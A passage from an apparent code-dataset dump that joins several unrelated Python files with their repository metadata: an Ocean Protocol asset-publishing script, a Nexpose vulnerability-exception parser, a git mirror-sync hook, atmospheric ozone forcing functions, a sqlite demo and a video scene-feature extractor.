parser.add_argument('--reward', type=int, help='Reward offered in Ocean token')
parser.add_argument('--number-nodes', type=int, help='Number of processor nodes requested')
args = parser.parse_args()
logging.info("************************************************************".format())
logging.info("*** ETHBERLINZWEI HACKATHON ***".format())
logging.info("*** SPEECH2TEXT ***".format())
logging.info("*** STEP 1 - CLIENT REGISTERS A CLIP INTO OCEAN PROTOCOL ***".format())
logging.info("************************************************************".format())
logging.info("".format())
logging.info("(Step 1.1 not implemented - upload audio file from client to storage)".format())
logging.info("Publishing Audio to NILE network: {}".format(args.url))
logging.info("Will set price to {} OCEAN".format(args.price))
logging.info("Offering {} OCEAN reward".format(args.reward))
logging.info("Requesting {} processors".format(args.number_nodes))
logging.info("".format())
#%%
# Get the configuration file path for this environment
logging.info("Configuration file selected: {}".format(OCEAN_CONFIG_PATH))
# logging.critical("Deployment type: {}".format(manta_utils.config.get_deployment_type()))
logging.info("Squid API version: {}".format(squid_py.__version__))
#%%
# Instantiate Ocean with the default configuration file.
configuration = Config(OCEAN_CONFIG_PATH)
squid_py.ConfigProvider.set_config(configuration)
ocn = Ocean(configuration)
#%%
# Get a publisher account
publisher_acct = manta_utils.user.get_account_by_index(ocn,0)
#%%
logging.info("Publisher account address: {}".format(publisher_acct.address))
logging.info("Publisher account Testnet 'ETH' balance: {:>6.1f}".format(ocn.accounts.balance(publisher_acct).eth/10**18))
logging.info("Publisher account Testnet Ocean balance: {:>6.1f}".format(ocn.accounts.balance(publisher_acct).ocn/10**18))
def publish(url, price, reward, number_nodes):
    # metadata = squid_py.ddo.metadata.Metadata.get_example()
    # print('Name of asset:', metadata['base']['name'])
    with open(JSON_TEMPLATE, 'r') as f:
        metadata = json.load(f)
    metadata['base']['files'][0]['url'] = url
    metadata['base']['price'] = str(price)
    metadata['additionalInformation']['reward'] = str(reward)
    metadata['additionalInformation']['numberNodes'] = str(number_nodes)
    ddo = ocn.assets.create(metadata, publisher_acct)
    registered_did = ddo.did
    logging.info("New asset registered at {}".format(str(registered_did)))
    logging.info("Asset name: {}".format(metadata['base']['name']))
    logging.info("Encrypted files to secret store, cipher text: [{}...] . ".format(ddo.metadata['base']['encryptedFiles'][:50]))
    return registered_did
registered_did = publish(args.url, args.price, args.reward, args.number_nodes)
# TODO: Better handling based on receipt
print("Wait for the transaction to complete!")
sleep(10)
# %%
ddo = ocn.assets.resolve(registered_did)
# print("Asset '{}' resolved from Aquarius metadata storage: {}".format(ddo.did,ddo.metadata['base']['name']))
# %% [markdown]
# Similarly, we can verify that this asset is registered into the blockchain, and that you are the owner.
# %%
# We need the pure ID string as in the DID registry (a DID without the prefixes)
asset_id = squid_py.did.did_to_id(registered_did)
owner = ocn._keeper.did_registry.contract_concise.getDIDOwner(asset_id)
# print("Asset ID", asset_id, "owned by", owner)
assert str.lower(owner) == str.lower(publisher_acct.address)
logging.info("".format())
logging.info("Successfully registered Audio!".format())
logging.info("Asset Owner: {}".format(owner))
logging.info("Asset DID: {}".format(registered_did))
| 36.986755 | 128 | 0.708684 | 721 | 5,585 | 5.363384 | 0.306519 | 0.06827 | 0.039566 | 0.024825 | 0.138092 | 0.088699 | 0.049651 | 0.049651 | 0.03129 | 0 | 0 | 0.012566 | 0.116562 | 5,585 | 150 | 129 | 37.233333 | 0.77118 | 0.253715 | 0 | 0.067568 | 0 | 0 | 0.315175 | 0.062014 | 0 | 0 | 0.010214 | 0.006667 | 0.054054 | 1 | 0.013514 | false | 0.054054 | 0.175676 | 0 | 0.202703 | 0.027027 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
7c359f84b8ac8bafab4c67c76d69bd091361babb
| 3,613 |
py
|
Python
|
nexpose/nexpose_vulnerabilityexception.py
|
Patralos/nexpose-client-python
|
bec81da29883b1b004046e29a9e7f7a6686467c1
|
[
"BSD-3-Clause"
] | 29 |
2017-06-27T04:44:03.000Z
|
2021-11-29T15:04:00.000Z
|
nexpose/nexpose_vulnerabilityexception.py
|
Patralos/nexpose-client-python
|
bec81da29883b1b004046e29a9e7f7a6686467c1
|
[
"BSD-3-Clause"
] | 40 |
2017-06-21T18:00:49.000Z
|
2018-06-06T21:13:34.000Z
|
nexpose/nexpose_vulnerabilityexception.py
|
Patralos/nexpose-client-python
|
bec81da29883b1b004046e29a9e7f7a6686467c1
|
[
"BSD-3-Clause"
] | 23 |
2017-07-18T16:40:57.000Z
|
2021-01-26T09:58:53.000Z
|
# Future Imports for py2/3 backwards compat.
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from builtins import object
from .xml_utils import get_attribute, get_content_of
from future import standard_library
standard_library.install_aliases()
def fix_null(data):
if data == 'null':
return 0
return data
class VulnerabilityExceptionStatus(object):
UNDER_REVIEW = "Under Review"
APPROVED = "Approved"
REJECTED = "Rejected"
DELETED = "Deleted" # This state is also used for recalled exceptions!
class VulnerabilityExceptionReason(object):
FALSE_POSITIVE = "False Positive"
COMPENSATING_CONTROL = "Compensating Control"
ACCEPTABLE_USE = "Acceptable Use"
ACCEPTABLE_RISK = "Acceptable Risk"
OTHER = "Other"
class VulnerabilityExceptionScope(object):
ALL_INSTANCES = "All Instances"
ALL_INSTANCES_SPECIFIC_ASSET = "All Instances on a Specific Asset"
ALL_INSTANCES_SPECIFIC_SITE = "All Instances on a Specific Site"
SPECIFIC_INSTANCE_SPECIFIC_ASSET = "Specific Instance of Specific Asset"
class SiloVulnerabilityExceptionDetails(object):
@staticmethod
def CreateFromXML(xml_data):
details = SiloVulnerabilityExceptionDetails()
details.silo_id = get_attribute(xml_data, 'siloId', details.silo_id)
details.oldest_exception_creation_date = get_attribute(xml_data, 'oldestExceptionCreationDate', details.oldest_exception_creation_date) # TODO: date object
details.pending_exception_count = get_attribute(xml_data, 'pendingVulnExceptionsCount', details.pending_exception_count)
return details
def __init__(self):
self.silo_id = ''
self.oldest_exception_creation_date = 'N/A' # TODO: date object
self.pending_exception_count = 0
class VulnerabilityException(object):
@staticmethod
def CreateFromXML(xml_data):
details = VulnerabilityException()
details.id = int(get_attribute(xml_data, 'exception-id', details.id))
details.vulnerability_id = get_attribute(xml_data, 'vuln-id', details.vulnerability_id)
details.vulnerability_key = get_attribute(xml_data, 'vuln-key', details.vulnerability_key)
details.expiration_date = get_attribute(xml_data, 'expiration-date', details.expiration_date) # TODO: date object
details.submitter = get_attribute(xml_data, 'submitter', details.submitter)
details.submitter_comment = get_content_of(xml_data, 'submitter-comment', details.submitter_comment)
details.reviewer = get_attribute(xml_data, 'reviewer', details.reviewer)
details.reviewer_comment = get_content_of(xml_data, 'reviewer-comment', details.reviewer_comment)
details.status = get_attribute(xml_data, 'status', details.status)
details.reason = get_attribute(xml_data, 'reason', details.reason)
details.scope = get_attribute(xml_data, 'scope', details.scope)
details.asset_id = int(fix_null(get_attribute(xml_data, 'device-id', details.asset_id)))
details.asset_port = int(fix_null(get_attribute(xml_data, 'port-no', details.asset_port)))
return details
def __init__(self):
self.id = 0
self.vulnerability_id = ''
self.vulnerability_key = ''
self.expiration_date = '' # TODO: date object
self.submitter = ''
self.submitter_comment = ''
self.reviewer = ''
self.reviewer_comment = ''
self.status = ''
self.reason = ''
self.scope = ''
self.asset_id = 0
self.asset_port = 0
| 42.011628 | 164 | 0.715749 | 408 | 3,613 | 6.056373 | 0.245098 | 0.050992 | 0.084986 | 0.107649 | 0.231081 | 0.10603 | 0.062323 | 0 | 0 | 0 | 0 | 0.002406 | 0.194575 | 3,613 | 85 | 165 | 42.505882 | 0.846735 | 0.045115 | 0 | 0.114286 | 0 | 0 | 0.118211 | 0.015394 | 0 | 0 | 0 | 0.011765 | 0 | 1 | 0.071429 | false | 0 | 0.057143 | 0 | 0.442857 | 0.014286 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7c4bb1688cf1e8399ddcf1585b39fc36418f8801
| 827 |
py
|
Python
|
modules/gitbox/files/asfgit/hooks/sync.py
|
Humbedooh/infrastructure-puppet
|
a85f797d847b80e877cd5b7c66513970f6f80703
|
[
"Apache-2.0"
] | 1 |
2019-06-09T10:25:04.000Z
|
2019-06-09T10:25:04.000Z
|
modules/gitbox/files/asfgit/hooks/sync.py
|
Humbedooh/infrastructure-puppet
|
a85f797d847b80e877cd5b7c66513970f6f80703
|
[
"Apache-2.0"
] | 1 |
2020-05-08T07:07:43.000Z
|
2020-05-08T07:07:43.000Z
|
modules/gitbox/files/asfgit/hooks/sync.py
|
Humbedooh/infrastructure-puppet
|
a85f797d847b80e877cd5b7c66513970f6f80703
|
[
"Apache-2.0"
] | 1 |
2019-12-31T07:28:19.000Z
|
2019-12-31T07:28:19.000Z
|
#!/usr/local/bin/python
import json
import socket
import sys
import asfgit.cfg as cfg
import asfgit.git as git
import asfgit.log as log
import asfgit.util as util
import subprocess, os, time
def main():
ghurl = "git@github:apache/%s.git" % cfg.repo_name
os.chdir("/x1/repos/asf/%s.git" % cfg.repo_name)
try:
for ref in git.stream_refs(sys.stdin):
if ref.is_rewrite():
print("Syncing %s (FORCED)..." % ref.name)
subprocess.check_call(["git", "push", "-f", ghurl, "%s:%s" % (ref.newsha, ref.name)])
else:
print("Syncing %s..." % ref.name)
subprocess.check_call(["git", "push", ghurl, "%s:%s" % (ref.newsha, ref.name)])
except subprocess.CalledProcessError as err:
util.abort("Could not sync with GitHub: %s" % err.output)
| 30.62963 | 98 | 0.613059 | 120 | 827 | 4.175 | 0.475 | 0.095808 | 0.027944 | 0.043912 | 0.283433 | 0.223553 | 0.223553 | 0 | 0 | 0 | 0 | 0.001565 | 0.227328 | 827 | 26 | 99 | 31.807692 | 0.782473 | 0.026602 | 0 | 0 | 0 | 0 | 0.16812 | 0.029888 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0 | 0.380952 | 0 | 0.428571 | 0.095238 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 |
0
| 1 |
7c5785c50891073f1d8d050a467303e1d02503f4
| 5,967 |
py
|
Python
|
fair/forcing/ozone_tr.py
|
znicholls/FAIR
|
599c44ed140b069968ba7d1ca99de40218e42545
|
[
"Apache-2.0"
] | 1 |
2020-11-14T16:09:39.000Z
|
2020-11-14T16:09:39.000Z
|
fair/forcing/ozone_tr.py
|
znicholls/FAIR
|
599c44ed140b069968ba7d1ca99de40218e42545
|
[
"Apache-2.0"
] | 1 |
2020-11-02T17:59:02.000Z
|
2020-11-02T17:59:02.000Z
|
fair/forcing/ozone_tr.py
|
znicholls/FAIR
|
599c44ed140b069968ba7d1ca99de40218e42545
|
[
"Apache-2.0"
] | 2 |
2020-11-02T16:42:05.000Z
|
2020-12-15T16:36:24.000Z
|
from __future__ import division

import numpy as np

from ..constants import molwt


def regress(emissions,
            beta=np.array([2.8249e-4, 1.0695e-4, -9.3604e-4, 99.7831e-4])):
    """Calculates tropospheric ozone forcing from precursor emissions.

    Inputs: (nt x 40) emissions array

    Keywords:
        beta: 4-element array of regression coefficients of precursor
              radiative efficiency, W m-2 (Mt yr-1)-1.
              order is [CH4, CO, NMVOC, NOx]

    Outputs:
        tropospheric ozone ERF time series.
    """

    if emissions.ndim == 2:
        em_CH4, em_CO, em_NMVOC, em_NOx = emissions[:, [3, 6, 7, 8]].T
    else:
        em_CH4, em_CO, em_NMVOC, em_NOx = emissions[[3, 6, 7, 8]]

    F_CH4 = beta[0] * em_CH4
    F_CO = beta[1] * em_CO
    F_NMVOC = beta[2] * em_NMVOC
    F_NOx = beta[3] * em_NOx

    F = F_CH4 + F_CO + F_NMVOC + F_NOx
    return F
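
# A shape-only usage sketch (our addition): a (nt x 40) all-zero emissions
# array yields zero tropospheric ozone forcing for every timestep.
# F = regress(np.zeros((3, 40)))  # -> array([0., 0., 0.])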
def cmip6_stevenson(emissions, C_CH4, T=0, feedback=False,
                    PI=np.array([722, 170, 10, 4.29]),
                    beta=np.array([1.77871043e-04, 5.80173377e-05,
                                   2.09151270e-03, 1.94458719e-04])):
    """Calculates tropospheric ozone forcing from precursor emissions based on
    Stevenson et al, 2013 10.5194/acp-13-3063-2013

    Inputs:
        emissions: (nt x 40) numpy array
        C_CH4    : (nt) numpy array of methane concentrations, ppb

    Keywords:
        T        : change in surface temperature since pre-industrial
        feedback : True or False - include temperature feedback on ozone
                   forcing?
        PI       : 4-element array of pre-industrial CH4 concentrations,
                   CO emissions, NMVOC emissions and NOx emissions
        beta     : coefficients of how CH4 concentrations, CO emissions,
                   NMVOC emissions and NOx emissions affect forcing

    Outputs:
        tropospheric ozone ERF time series.
    """

    # expand to 2D/1D if not already
    if emissions.ndim == 1:
        nspec = len(emissions)
        emissions = emissions.reshape((1, nspec))
    if np.isscalar(C_CH4):
        C_CH4 = np.ones(1) * C_CH4

    year, em_CO, em_NMVOC, em_NOx = emissions[:, [0, 6, 7, 8]].T
    nt = len(year)
    F_CH4, F_CO, F_NMVOC, F_NOx = np.zeros((4, nt))

    for i in range(nt):
        F_CH4[i] = beta[0] * (C_CH4[i] - PI[0])
        F_CO[i] = beta[1] * (em_CO[i] - PI[1])
        F_NMVOC[i] = beta[2] * (em_NMVOC[i] - PI[2])
        F_NOx[i] = beta[3] * (em_NOx[i] - PI[3])

    # Include the effect of climate feedback? We fit a curve to the 2000, 2030
    # and 2100 best estimates of feedback based on middle-of-the-road
    # temperature projections.
    def temperature_feedback(T, a=0.03189267, b=1.34966941, c=-0.03214807):
        if T <= 0:
            return 0
        else:
            return a * np.exp(-b * T) + c

    if feedback:
        F = F_CH4 + F_CO + F_NMVOC + F_NOx + temperature_feedback(T)
    else:
        F = F_CH4 + F_CO + F_NMVOC + F_NOx

    return F


def stevenson(emissions, C_CH4, T=0, feedback=False, fix_pre1850_RCP=False,
              PI=np.array([722, 170, 10, 4.29])):
    """Calculates tropospheric ozone forcing from precursor emissions based on
    Stevenson et al, 2013 10.5194/acp-13-3063-2013

    Inputs:
        emissions: (nt x 40) numpy array
        C_CH4    : (nt) numpy array of methane concentrations, ppb

    Keywords:
        T              : change in surface temperature since pre-industrial
        feedback       : True or False - include temperature feedback on
                         ozone forcing?
        fix_pre1850_RCP: Use different relationship for 1750/65 to 1850 based
                         on anthropogenic emissions from Skeie et al (2011)
                         for 1750 (atmos-chem-phys.net/11/11827/2011)
        PI             : 4-element array of pre-industrial CH4 concentrations,
                         CO emissions, NMVOC emissions and NOx emissions

    Outputs:
        tropospheric ozone ERF time series.
    """

    # expand to 2D/1D if not already
    if emissions.ndim == 1:
        nspec = len(emissions)
        emissions = emissions.reshape((1, nspec))
    if np.isscalar(C_CH4):
        C_CH4 = np.ones(1) * C_CH4

    # numbers in denominator are 2000-1750 concs or emissions used in
    # Stevenson and traced back to Lamarque et al 2010 for 2000
    # https://www.atmos-chem-phys.net/10/7017/2010/
    year, em_CO, em_NMVOC, em_NOx = emissions[:, [0, 6, 7, 8]].T
    nt = len(year)
    F_CH4, F_CO, F_NMVOC, F_NOx = np.zeros((4, nt))

    for i in range(nt):
        if year[i] >= 1850 or fix_pre1850_RCP == False:
            F_CH4[i] = 0.166 / 960 * (C_CH4[i] - PI[0])
            F_CO[i] = 0.058 / 681.8 * (em_CO[i] - PI[1])
            F_NMVOC[i] = 0.035 / 155.84 * (em_NMVOC[i] - PI[2])
            F_NOx[i] = 0.119 / 61.16 * (em_NOx[i] *
                                        molwt.NO / molwt.N - PI[3])
        # The RCP scenarios give a negative forcing prior to ~1780. This is
        # because the anthropogenic emissions are given to be zero in RCPs but
        # not zero in the Skeie numbers which are used here. This can be fixed
        # to give a more linear behaviour.
        else:
            F_CH4[i] = 0.166 / 960 * (C_CH4[i] - 722)
            F_CO[i] = 0.058 / 681.8 * 215.59 * em_CO[i] / 385.59
            F_NMVOC[i] = 0.035 / 155.84 * 51.97 * em_NMVOC[i] / 61.97
            F_NOx[i] = 0.119 / 61.16 * 7.31 * (em_NOx[i]
                                               * molwt.NO / molwt.N) / 11.6

    # Include the effect of climate feedback? We fit a curve to the 2000, 2030
    # and 2100 best estimates of feedback based on middle-of-the-road
    # temperature projections.
    def temperature_feedback(T, a=0.03189267, b=1.34966941, c=-0.03214807):
        if T <= 0:
            return 0
        else:
            return a * np.exp(-b * T) + c

    if feedback:
        F = F_CH4 + F_CO + F_NMVOC + F_NOx + temperature_feedback(T)
    else:
        F = F_CH4 + F_CO + F_NMVOC + F_NOx

    return F
| 36.384146 | 78 | 0.586224 | 911 | 5,967 | 3.731065 | 0.231614 | 0.015299 | 0.014122 | 0.014416 | 0.702265 | 0.702265 | 0.69138 | 0.644307 | 0.600177 | 0.558694 | 0 | 0.113499 | 0.306016 | 5,967 | 163 | 79 | 36.607362 | 0.707317 | 0.452321 | 0 | 0.56 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.04 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7c67a7fccb58ad0744513e429cedf4044452005e
| 311 |
py
|
Python
|
databases/music.py
|
danielicapui/programa-o-avancada
|
d0e5b876b951ae04a46ffcda0dc0143e3f7114d9
|
[
"MIT"
] | null | null | null |
databases/music.py
|
danielicapui/programa-o-avancada
|
d0e5b876b951ae04a46ffcda0dc0143e3f7114d9
|
[
"MIT"
] | null | null | null |
databases/music.py
|
danielicapui/programa-o-avancada
|
d0e5b876b951ae04a46ffcda0dc0143e3f7114d9
|
[
"MIT"
] | null | null | null |
from utills import *

conn, cur = start('music')
criarTabela("tracks", "title text,plays integer")
music = [('trunder', 20),
         ('my way', 15)]
insertInto("tracks", "title,plays", music)
# cur.executemany("insert into tracks (title,plays) values (?,?)", music)
buscaTabela("tracks", "title")
conn.commit()
conn.close()
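
# Sketch of the imported helper (our assumption - `utills` is the author's own
# module and its real implementation may differ):
# import sqlite3
# def start(name):
#     conn = sqlite3.connect(name + '.sqlite')
#     return conn, conn.cursor()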
| 25.916667 | 71 | 0.691318 | 40 | 311 | 5.375 | 0.65 | 0.204651 | 0.148837 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014235 | 0.096463 | 311 | 11 | 72 | 28.272727 | 0.75089 | 0.22508 | 0 | 0 | 0 | 0 | 0.316667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7c684d5c56bbbdacbeb8612a9b08130a83635f9a
| 13,250 |
py
|
Python
|
video_analysis/code/scene_postprocess.py
|
pdxcycling/carv.io
|
cce0f91a76d3ceed714b3625d415131fd9540899
|
[
"MIT"
] | null | null | null |
video_analysis/code/scene_postprocess.py
|
pdxcycling/carv.io
|
cce0f91a76d3ceed714b3625d415131fd9540899
|
[
"MIT"
] | null | null | null |
video_analysis/code/scene_postprocess.py
|
pdxcycling/carv.io
|
cce0f91a76d3ceed714b3625d415131fd9540899
|
[
"MIT"
] | null | null | null |
import pandas as pd
import numpy as np
import re
from collections import Counter

from flow_preprocess import FlowPreprocess


class ScenePostprocess(object):
    """
    Heavy-lifting macro-feature class
    """

    def __init__(self, flow_df, quality_df, remove_transitions=False):
        """
        Default constructor

        Args:
            flow_df: Optical flow dataframe
            quality_df: Image quality dataframe
            remove_transitions: whether to remove frames around
                scene transitions
        Returns:
            Nothing
        """
        self.flow_df = flow_df.copy()
        self.quality_df = quality_df.copy()
        self.remove_transitions = remove_transitions
        self.is_static = None
        self.duration = self.get_duration()
        self.num_frames = quality_df.shape[0]

        ## Do some rudimentary cleaning of/adding to the flow data
        self.flow_df['distance'] = FlowPreprocess.flow_distances(self.flow_df)
        self.flow_df['angle'] = FlowPreprocess.flow_angles(self.flow_df)

        ## Add scene-centric timestamps
        ## TODO: This has a few issues with actual start times...
        scene_time_offset = self.quality_df['time'].min()
        self.flow_df['time_scene'] = self.flow_df['time'] - scene_time_offset
        self.quality_df['time_scene'] = self.quality_df['time'] - scene_time_offset
        self.min_time_scene = self.quality_df['time_scene'].min()
        self.max_time_scene = self.quality_df['time_scene'].max()
        self.min_frame_num = self.quality_df['frame_number'].min()
        self.max_frame_num = self.quality_df['frame_number'].max()

    def _find_columns_by_name(self, df, name_re):
        """
        Helper function to find binned features by the prefixes in their names

        Args:
            df: Dataframe
            name_re: regular expression for finding columns
        Returns:
            List of columns that have names that match name_re
        """
        output = []
        cols = df.columns
        for c in cols:
            if re.search(name_re, c):
                output.append(c)
        return output

    def get_duration(self):
        """
        Find scene duration (in seconds)

        Args:
            None
        Returns:
            Duration of scene in seconds
        """
        min_time = np.min(self.quality_df['time'])
        max_time = np.max(self.quality_df['time'])
        return max_time - min_time

    def get_avg_blur(self):
        """
        Find average blur across entire scene

        NOTE: The higher the number, the less the blur.

        Args:
            None
        Returns:
            Average blur as single float value
        """
        avg_blur = np.mean(self.quality_df['blur'])
        return avg_blur

    def get_blur_percentage(self, blur_threshold=100):
        """
        Proportion of frames in scene that are blurry.
        A frame is "blurry" if its average blur is below blur_threshold

        Args:
            blur_threshold: A float value that defines the threshold between
                blurry and non-blurry
        Returns:
            Float value of the proportion of the scene's frames that are blurry
        """
        blur_pct = 1. * np.sum(self.quality_df['blur'] < blur_threshold) / self.quality_df.shape[0]
        return blur_pct

    def get_top_colors(self, num_colors=10):
        """
        Find the dominant colors in all frames across the scene

        NOTE: This can be sped up if only a subset of frames are sampled.
        Need to run experiments on the optimal sampling rate.

        TODO: This approach should be changed in v2.0

        Args:
            num_colors: The number of most common colors to return.
                This is 10 by default.
        Returns:
            The most prevalent colors in the scene (NB: a lazy map object
            under Python 3)
        """
        self.num_colors = num_colors
        max_color_array = np.array(str)
        cols = self._find_columns_by_name(self.quality_df, "hue")
        for frame_num in range(self.min_frame_num, self.max_frame_num + 1):
            ## .loc replaces the deprecated (and since removed) .ix accessor
            frame_color_array = self.quality_df[cols].loc[frame_num].sort_values()[::-1].index.values[:self.num_colors]
            max_color_array = np.append(max_color_array, frame_color_array)
        ## Find most common colors
        color_count = Counter(max_color_array)
        return map(lambda x: x[0], color_count.most_common(self.num_colors))
def _get_values_from_bin_names(self, cols):
"""
From a list of columns representing bins, return a list of the values
of those bins
Args:
cols: a list of column names of histogram bins
Returns:
A list of the value of each bin
"""
values = []
for c in cols:
matches = re.search('_(\d+.\d+)', c)
if matches:
values.append(float(matches.groups(0)[0]))
else:
## This should never happen, but just in case...
values.append(None)
return values
def get_avg_saturation(self):
"""
Find the average saturation across all frames in the scene
Args:
None
Returns:
A float value of average scene saturation
"""
cols = self._find_columns_by_name(self.quality_df, "sat")
vals = self._get_values_from_bin_names(cols)
sums = self.quality_df[cols].sum()
avg = np.sum((sums * vals).values)/np.sum(sums)
return avg
def get_avg_value(self):
"""
Find the average value (from HSV colorspace) across
all frames in the scene
Args:
None
Returns:
A float value of average scene HSV value
"""
cols = self._find_columns_by_name(self.quality_df, "val")
vals = self._get_values_from_bin_names(cols)
sums = self.quality_df[cols].sum()
avg = np.sum((sums * vals).values)/np.sum(sums)
return avg
def get_pixel_pct(self, col_name, frame_size=(480., 360.)):
"""
Calculates the number of pixels in a scene are in col_name
Args:
col_name: the name of column of interest
frame_size:
Returns:
Proportion of pixels that are in the column of interest
"""
frame_pixels = frame_size[0] * frame_size[1]
num_frames = self.quality_df.shape[0]
total_pixels = frame_pixels * num_frames
pixel_cnt = np.sum(self.quality_df[col_name])
return pixel_cnt / total_pixels
"""
vvv Flow calculations vvv
"""
def get_flow_percentile(self, percentile=0.5):
"""
Find the distance traveled by optical flow point,
filtered by the specified percentile.
Args:
percentile: Flow distance percentile to return.
Percentile is between 0 and 1.
Returns:
A float value of the flow distance
"""
return self.flow_df['distance'].quantile(percentile)
def get_avg_flow(self):
"""
Find the average distance an optical flow point has traveled between
frames.
Args:
None
Returns:
A float value of the average distance an optical flow point
has traveled between frames
"""
return self.flow_df['distance'].mean()
def get_shake(self):
"""
Return the shakiness of the scene. Shake is calculated by finding the
median distance an optical flow point has traveled in each frame, and
averaging these values.
TODO: vector addition.
Args:
None.
Returns:
A float value representing the shakiness of a scene.
"""
if not self.flow_df.empty:
shake = np.mean((self.flow_df.groupby('frame_number').median())['distance'])
else:
shake = 0
return shake
def get_flow_angle(self):
"""
Find the average angle of travel of the optical flow points in a scene.
Args:
None
Returns:
A float value of the average optical flow angle
"""
return self.flow_df['angle'].mean()
def get_flow_angle_std_dev(self):
"""
Find the standard devation of all optical flows in a scene
Args:
None
Returns:
A float value of the standard deviation of optical flow angle
"""
return self.flow_df['angle'].std()
def is_static_scene(self, remove_transitions=False):
"""
Determine whether or not the scene is static (vs. an action scene)
TODO: Ignore some time around scene transitions because of fades.
Ensure that scene is long enough.
Args:
remove_transitions: remove frames at beginning and end of scene
Returns:
A boolean value of whether a scene is static or not.
"""
is_static = None
motion_threshold = 1 # one pixel of movement
total_flow_points = self.flow_df.shape[0] ## number of flow points in range
thresholded_df = self.flow_df[self.flow_df['distance'] > motion_threshold].copy()
if thresholded_df.empty:
is_static = True
else:
## Due to "artsy" transitions, ignore around beginning/end of scene
if remove_transitions:
## Amount of transition time between scenes
## This could be a percentage...
transition_time_buffer = 1 # in seconds
## Ensure that scene is long enough to remove buffer from analysis
if self.max_time_scene > transition_time_buffer:
thresholded_df = thresholded_df[thresholded_df['time_scene'] > transition_time_buffer]
thresholded_df = thresholded_df[thresholded_df['time_scene'] < self.max_time_scene - transition_time_buffer]
## Do not remove transitions if scene is too short
else:
pass
if not thresholded_df.empty:
##moving_flow_points = thresholded_df.shape[0]
moving_frames = thresholded_df.groupby(by=['frame_number']).mean().shape[0]
else:
##moving_flow_points = 0
moving_frames = 0
##pts_ratio = 1. * moving_flow_points/self.num_frames
pts_ratio = 1. * moving_frames/self.num_frames
# less than 1 moving frame per 4 frames
is_static = pts_ratio < .25
return is_static
def num_trackable_points_per_frame(self):
"""
Find the total number of optical flow points that are trackable per
frame.
"Trackability" is defined as being able to find a specific optical
flow point between frames.
Args:
None
Returns:
A dataframe with the number of trackable points, by frame.
"""
return self.flow_df.groupby('frame_number').size()
def avg_num_trackable_points_per_frame(self):
"""
Find the average number of optical flow points that are trackable,
over all frames in the scene.
"Trackability" is defined as being able to find a specific optical
flow point between frames.
Args:
None
Returns:
A float value of the average number of trackable optical flow
points in all of the scene's frames
"""
return 1. * len(self.flow_df) / self.num_frames
def to_df(self):
"""
Return a dataframe containing all features
TODO: better type checking
Args:
None
Returns:
Dataframe with all features
"""
scene_df = pd.DataFrame(index=[0])
top_colors = self.get_top_colors()
for n in range(self.num_colors):
scene_df['top_color_' + str(n)] = top_colors[n]
scene_df['avg_sat'] = self.get_avg_saturation()
scene_df['avg_val'] = self.get_avg_value()
scene_df['black_pixel_pct'] = self.get_pixel_pct('num_black_pixels')
scene_df['white_pixel_pct'] = self.get_pixel_pct('num_white_pixels')
scene_df['flow_percentile_25'] = self.get_flow_percentile(0.25)
scene_df['flow_percentile_50'] = self.get_flow_percentile(0.50)
scene_df['flow_percentile_75'] = self.get_flow_percentile(0.75)
scene_df['flow_avg'] = self.get_avg_flow()
scene_df['flow_angle'] = self.get_flow_angle()
scene_df['flow_angle_std_dev'] = self.get_flow_angle_std_dev()
scene_df['is_static_scene'] = self.is_static_scene()
##scene_df['action_peak_in_scene'] = None # where in scene does no
scene_df['shake_coeff'] = self.get_shake()
scene_df['avg_flow_pts_per_frame'] = self.avg_num_trackable_points_per_frame()
scene_df['blur'] = self.get_avg_blur()
scene_df['blur_pct'] = self.get_blur_percentage()
scene_df['duration'] = self.get_duration()
return scene_df
| 35.05291 | 128 | 0.60234 | 1,702 | 13,250 | 4.480024 | 0.174501 | 0.029508 | 0.035803 | 0.016787 | 0.309115 | 0.268459 | 0.229246 | 0.183475 | 0.153311 | 0.132852 | 0 | 0.006762 | 0.31917 | 13,250 | 377 | 129 | 35.145889 | 0.838488 | 0.367774 | 0 | 0.109489 | 0 | 0 | 0.066629 | 0.003146 | 0 | 0 | 0 | 0.013263 | 0 | 1 | 0.138686 | false | 0.007299 | 0.036496 | 0 | 0.313869 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7c6cc14ec8ce3c7dc9875cccdf742d57d079973d
| 10,181 |
py
|
Python
|
diofant/tests/integrals/test_heurisch.py
|
